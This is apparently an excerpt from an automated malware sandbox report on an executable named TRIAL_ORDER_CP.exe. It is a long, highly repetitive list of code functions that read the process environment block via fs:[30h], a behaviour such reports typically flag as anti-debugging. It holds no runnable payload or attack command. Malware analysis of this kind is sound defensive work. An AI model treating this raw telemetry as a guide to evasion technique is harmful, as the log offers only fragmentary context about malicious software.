        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B30230 mov ecx, dword ptr fs:[00000030h] 3_2_33B30230
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B90227 mov eax, dword ptr fs:[00000030h] 3_2_33B90227
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B90227 mov eax, dword ptr fs:[00000030h] 3_2_33B90227
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B90227 mov eax, dword ptr fs:[00000030h] 3_2_33B90227
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B4A22B mov eax, dword ptr fs:[00000030h] 3_2_33B4A22B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B4A22B mov eax, dword ptr fs:[00000030h] 3_2_33B4A22B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B4A22B mov eax, dword ptr fs:[00000030h] 3_2_33B4A22B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0821B mov eax, dword ptr fs:[00000030h] 3_2_33B0821B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B9B214 mov eax, dword ptr fs:[00000030h] 3_2_33B9B214
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B9B214 mov eax, dword ptr fs:[00000030h] 3_2_33B9B214
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0A200 mov eax, dword ptr fs:[00000030h] 3_2_33B0A200
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0B273 mov eax, dword ptr fs:[00000030h] 3_2_33B0B273
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0B273 mov eax, dword ptr fs:[00000030h] 3_2_33B0B273
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0B273 mov eax, dword ptr fs:[00000030h] 3_2_33B0B273
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BA327E mov eax, dword ptr fs:[00000030h] 3_2_33BA327E
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BA327E mov eax, dword ptr fs:[00000030h] 3_2_33BA327E
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BA327E mov eax, dword ptr fs:[00000030h] 3_2_33BA327E
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BA327E mov eax, dword ptr fs:[00000030h] 3_2_33BA327E
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BA327E mov eax, dword ptr fs:[00000030h] 3_2_33BA327E
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BA327E mov eax, dword ptr fs:[00000030h] 3_2_33BA327E
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BCD270 mov eax, dword ptr fs:[00000030h] 3_2_33BCD270
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B8D250 mov eax, dword ptr fs:[00000030h] 3_2_33B8D250
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B8D250 mov ecx, dword ptr fs:[00000030h] 3_2_33B8D250
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BD124C mov eax, dword ptr fs:[00000030h] 3_2_33BD124C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BD124C mov eax, dword ptr fs:[00000030h] 3_2_33BD124C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BD124C mov eax, dword ptr fs:[00000030h] 3_2_33BD124C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BD124C mov eax, dword ptr fs:[00000030h] 3_2_33BD124C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3F24A mov eax, dword ptr fs:[00000030h] 3_2_33B3F24A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BCF247 mov eax, dword ptr fs:[00000030h] 3_2_33BCF247
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BE51B6 mov eax, dword ptr fs:[00000030h] 3_2_33BE51B6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B431BE mov eax, dword ptr fs:[00000030h] 3_2_33B431BE
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B431BE mov eax, dword ptr fs:[00000030h] 3_2_33B431BE
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B441BB mov ecx, dword ptr fs:[00000030h] 3_2_33B441BB
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B441BB mov eax, dword ptr fs:[00000030h] 3_2_33B441BB
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B441BB mov eax, dword ptr fs:[00000030h] 3_2_33B441BB
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B4E1A4 mov eax, dword ptr fs:[00000030h] 3_2_33B4E1A4
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B4E1A4 mov eax, dword ptr fs:[00000030h] 3_2_33B4E1A4
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B51190 mov eax, dword ptr fs:[00000030h] 3_2_33B51190
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B51190 mov eax, dword ptr fs:[00000030h] 3_2_33B51190
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B39194 mov eax, dword ptr fs:[00000030h] 3_2_33B39194
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B14180 mov eax, dword ptr fs:[00000030h] 3_2_33B14180
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B14180 mov eax, dword ptr fs:[00000030h] 3_2_33B14180
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B14180 mov eax, dword ptr fs:[00000030h] 3_2_33B14180
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B091F0 mov eax, dword ptr fs:[00000030h] 3_2_33B091F0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B091F0 mov eax, dword ptr fs:[00000030h] 3_2_33B091F0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B201F1 mov eax, dword ptr fs:[00000030h] 3_2_33B201F1
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B201F1 mov eax, dword ptr fs:[00000030h] 3_2_33B201F1
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B201F1 mov eax, dword ptr fs:[00000030h] 3_2_33B201F1
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3F1F0 mov eax, dword ptr fs:[00000030h] 3_2_33B3F1F0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3F1F0 mov eax, dword ptr fs:[00000030h] 3_2_33B3F1F0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1A1E3 mov eax, dword ptr fs:[00000030h] 3_2_33B1A1E3
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1A1E3 mov eax, dword ptr fs:[00000030h] 3_2_33B1A1E3
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1A1E3 mov eax, dword ptr fs:[00000030h] 3_2_33B1A1E3
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1A1E3 mov eax, dword ptr fs:[00000030h] 3_2_33B1A1E3
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1A1E3 mov eax, dword ptr fs:[00000030h] 3_2_33B1A1E3
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BD81EE mov eax, dword ptr fs:[00000030h] 3_2_33BD81EE
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BD81EE mov eax, dword ptr fs:[00000030h] 3_2_33BD81EE
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3B1E0 mov eax, dword ptr fs:[00000030h] 3_2_33B3B1E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3B1E0 mov eax, dword ptr fs:[00000030h] 3_2_33B3B1E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3B1E0 mov eax, dword ptr fs:[00000030h] 3_2_33B3B1E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3B1E0 mov eax, dword ptr fs:[00000030h] 3_2_33B3B1E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3B1E0 mov eax, dword ptr fs:[00000030h] 3_2_33B3B1E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3B1E0 mov eax, dword ptr fs:[00000030h] 3_2_33B3B1E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3B1E0 mov eax, dword ptr fs:[00000030h] 3_2_33B3B1E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B191E5 mov eax, dword ptr fs:[00000030h] 3_2_33B191E5
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B191E5 mov eax, dword ptr fs:[00000030h] 3_2_33B191E5
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B081EB mov eax, dword ptr fs:[00000030h] 3_2_33B081EB
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B201C0 mov eax, dword ptr fs:[00000030h] 3_2_33B201C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B201C0 mov eax, dword ptr fs:[00000030h] 3_2_33B201C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B251C0 mov eax, dword ptr fs:[00000030h] 3_2_33B251C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B251C0 mov eax, dword ptr fs:[00000030h] 3_2_33B251C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B251C0 mov eax, dword ptr fs:[00000030h] 3_2_33B251C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B251C0 mov eax, dword ptr fs:[00000030h] 3_2_33B251C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BCF13E mov eax, dword ptr fs:[00000030h] 3_2_33BCF13E
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B9A130 mov eax, dword ptr fs:[00000030h] 3_2_33B9A130
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B47128 mov eax, dword ptr fs:[00000030h] 3_2_33B47128
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B47128 mov eax, dword ptr fs:[00000030h] 3_2_33B47128
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h] 3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h] 3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h] 3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h] 3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h] 3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h] 3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h] 3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h] 3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h] 3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h] 3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h] 3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h] 3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h] 3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h] 3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h] 3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h] 3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h] 3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h] 3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h] 3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h] 3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h] 3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B40118 mov eax, dword ptr fs:[00000030h] 3_2_33B40118
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h] 3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h] 3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h] 3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h] 3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h] 3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h] 3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h] 3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h] 3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h] 3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h] 3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h] 3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h] 3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h] 3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1510D mov eax, dword ptr fs:[00000030h] 3_2_33B1510D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B16179 mov eax, dword ptr fs:[00000030h] 3_2_33B16179
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B6717A mov eax, dword ptr fs:[00000030h] 3_2_33B6717A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B6717A mov eax, dword ptr fs:[00000030h] 3_2_33B6717A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B4716D mov eax, dword ptr fs:[00000030h] 3_2_33B4716D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BE3157 mov eax, dword ptr fs:[00000030h] 3_2_33BE3157
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BE3157 mov eax, dword ptr fs:[00000030h] 3_2_33BE3157
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BE3157 mov eax, dword ptr fs:[00000030h] 3_2_33BE3157
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE3157 mov eax, dword ptr fs:[00000030h]3_2_33BE3157
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4415F mov eax, dword ptr fs:[00000030h]3_2_33B4415F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA314A mov eax, dword ptr fs:[00000030h]3_2_33BA314A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA314A mov eax, dword ptr fs:[00000030h]3_2_33BA314A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA314A mov eax, dword ptr fs:[00000030h]3_2_33BA314A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA314A mov eax, dword ptr fs:[00000030h]3_2_33BA314A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE5149 mov eax, dword ptr fs:[00000030h]3_2_33BE5149
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0A147 mov eax, dword ptr fs:[00000030h]3_2_33B0A147
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0A147 mov eax, dword ptr fs:[00000030h]3_2_33B0A147
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0A147 mov eax, dword ptr fs:[00000030h]3_2_33B0A147
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE50B7 mov eax, dword ptr fs:[00000030h]3_2_33BE50B7
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BCB0AF mov eax, dword ptr fs:[00000030h]3_2_33BCB0AF
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF0A5 mov eax, dword ptr fs:[00000030h]3_2_33BBF0A5
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF0A5 mov eax, dword ptr fs:[00000030h]3_2_33BBF0A5
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF0A5 mov eax, dword ptr fs:[00000030h]3_2_33BBF0A5
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF0A5 mov eax, dword ptr fs:[00000030h]3_2_33BBF0A5
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF0A5 mov eax, dword ptr fs:[00000030h]3_2_33BBF0A5
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF0A5 mov eax, dword ptr fs:[00000030h]3_2_33BBF0A5
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF0A5 mov eax, dword ptr fs:[00000030h]3_2_33BBF0A5
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0C090 mov eax, dword ptr fs:[00000030h]3_2_33B0C090
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0A093 mov ecx, dword ptr fs:[00000030h]3_2_33B0A093
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE4080 mov eax, dword ptr fs:[00000030h]3_2_33BE4080
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE4080 mov eax, dword ptr fs:[00000030h]3_2_33BE4080
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE4080 mov eax, dword ptr fs:[00000030h]3_2_33BE4080
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE4080 mov eax, dword ptr fs:[00000030h]3_2_33BE4080
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE4080 mov eax, dword ptr fs:[00000030h]3_2_33BE4080
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE4080 mov eax, dword ptr fs:[00000030h]3_2_33BE4080
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE4080 mov eax, dword ptr fs:[00000030h]3_2_33BE4080
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4D0F0 mov eax, dword ptr fs:[00000030h]3_2_33B4D0F0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4D0F0 mov ecx, dword ptr fs:[00000030h]3_2_33B4D0F0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0C0F6 mov eax, dword ptr fs:[00000030h]3_2_33B0C0F6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B090F8 mov eax, dword ptr fs:[00000030h]3_2_33B090F8
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B090F8 mov eax, dword ptr fs:[00000030h]3_2_33B090F8
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B090F8 mov eax, dword ptr fs:[00000030h]3_2_33B090F8
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B090F8 mov eax, dword ptr fs:[00000030h]3_2_33B090F8
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2B0D0 mov eax, dword ptr fs:[00000030h]3_2_33B2B0D0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0B0D6 mov eax, dword ptr fs:[00000030h]3_2_33B0B0D6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0B0D6 mov eax, dword ptr fs:[00000030h]3_2_33B0B0D6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0B0D6 mov eax, dword ptr fs:[00000030h]3_2_33B0B0D6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0B0D6 mov eax, dword ptr fs:[00000030h]3_2_33B0B0D6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0D02D mov eax, dword ptr fs:[00000030h]3_2_33B0D02D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52010 mov ecx, dword ptr fs:[00000030h]3_2_33B52010
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B35004 mov eax, dword ptr fs:[00000030h]3_2_33B35004
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B35004 mov ecx, dword ptr fs:[00000030h]3_2_33B35004
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B18009 mov eax, dword ptr fs:[00000030h]3_2_33B18009
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B16074 mov eax, dword ptr fs:[00000030h]3_2_33B16074
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B16074 mov eax, dword ptr fs:[00000030h]3_2_33B16074
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BB9060 mov eax, dword ptr fs:[00000030h]3_2_33BB9060
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B11051 mov eax, dword ptr fs:[00000030h]3_2_33B11051
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B11051 mov eax, dword ptr fs:[00000030h]3_2_33B11051
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE505B mov eax, dword ptr fs:[00000030h]3_2_33BE505B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B40044 mov eax, dword ptr fs:[00000030h]3_2_33B40044
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE17BC mov eax, dword ptr fs:[00000030h]3_2_33BE17BC
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B107A7 mov eax, dword ptr fs:[00000030h]3_2_33B107A7
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BDD7A7 mov eax, dword ptr fs:[00000030h]3_2_33BDD7A7
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BDD7A7 mov eax, dword ptr fs:[00000030h]3_2_33BDD7A7
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BDD7A7 mov eax, dword ptr fs:[00000030h]3_2_33BDD7A7
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B41796 mov eax, dword ptr fs:[00000030h]3_2_33B41796
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B41796 mov eax, dword ptr fs:[00000030h]3_2_33B41796
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E79D mov eax, dword ptr fs:[00000030h]3_2_33B8E79D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E79D mov eax, dword ptr fs:[00000030h]3_2_33B8E79D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E79D mov eax, dword ptr fs:[00000030h]3_2_33B8E79D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E79D mov eax, dword ptr fs:[00000030h]3_2_33B8E79D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E79D mov eax, dword ptr fs:[00000030h]3_2_33B8E79D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E79D mov eax, dword ptr fs:[00000030h]3_2_33B8E79D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E79D mov eax, dword ptr fs:[00000030h]3_2_33B8E79D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E79D mov eax, dword ptr fs:[00000030h]3_2_33B8E79D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E79D mov eax, dword ptr fs:[00000030h]3_2_33B8E79D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BEB781 mov eax, dword ptr fs:[00000030h]3_2_33BEB781
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BEB781 mov eax, dword ptr fs:[00000030h]3_2_33BEB781
